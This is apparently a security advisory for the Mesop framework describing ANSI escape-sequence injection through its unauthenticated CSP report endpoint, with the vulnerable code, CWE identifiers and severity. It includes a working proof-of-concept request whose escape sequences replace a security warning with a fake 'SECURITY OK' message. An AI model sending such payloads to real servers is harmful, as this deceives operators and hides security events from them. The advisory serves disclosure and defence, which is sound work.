The /__csp__ endpoint accepts unauthenticated JSON reports and logs user-controlled values directly to stdout using print() without escaping control characters.
A remote attacker can include ANSI/VT100 escape sequences in fields such as blocked-uri or document-uri. When the logs are viewed in an ANSI-capable terminal, these sequences can manipulate the displayed output (e.g., clear the screen, hide text, or inject misleading messages), affecting the integrity of operator-facing logs.
The CSP reporting endpoint accepts arbitrary JSON and prints several request fields directly:
mesop/server/static_file_serving.py
@app.route(prefix_base_url("/__csp__"), methods=["POST"])
def csp_report():
report = request.get_json(force=True)
document_uri = report["csp-report"]["document-uri"]
blocked_uri = report["csp-report"]["blocked-uri"]
violated_directive = report["csp-report"]["violated-directive"]
print(f"... Blocked URL: {blocked_uri} ...")
Since these values are written to stdout without sanitization, ANSI escape sequences supplied by a remote client are preserved and interpreted by ANSI-compatible terminals.
Send the following request:
POST /__csp__
Content-Type: application/json
{
"csp-report": {
"document-uri": "https://victim.example",
"blocked-uri": "\u001b[2J\u001b[H\u001b[32m*** SECURITY OK - No CSP violations found ***\u001b[0m\n\u001b[8mhttps://evil.example",
"violated-directive": "script-src-elem"
}
}
The request is accepted (HTTP 204), and the injected escape sequences are written to stdout unchanged.
When the captured output is rendered in a VT100-compatible terminal (verified using pyte), the original CSP warning is visually replaced with attacker-controlled content.
Expected output
Content Security Policy Error
Directive: script-src-elem
Blocked URL: ...
App path: /app
Rendered output
*** SECURITY OK - No CSP violations found ***
https://evil.example
App path: /app
An unauthenticated remote attacker can submit a crafted request to the /csp endpoint containing ANSI/VT100 escape sequences. Because these values are written directly to stdout without sanitization, an attacker can:
{
"cwe_ids": [
"CWE-117",
"CWE-150"
],
"github_reviewed": true,
"github_reviewed_at": "2026-09-23T19:01:05Z",
"nvd_published_at": null,
"severity": "MODERATE"
}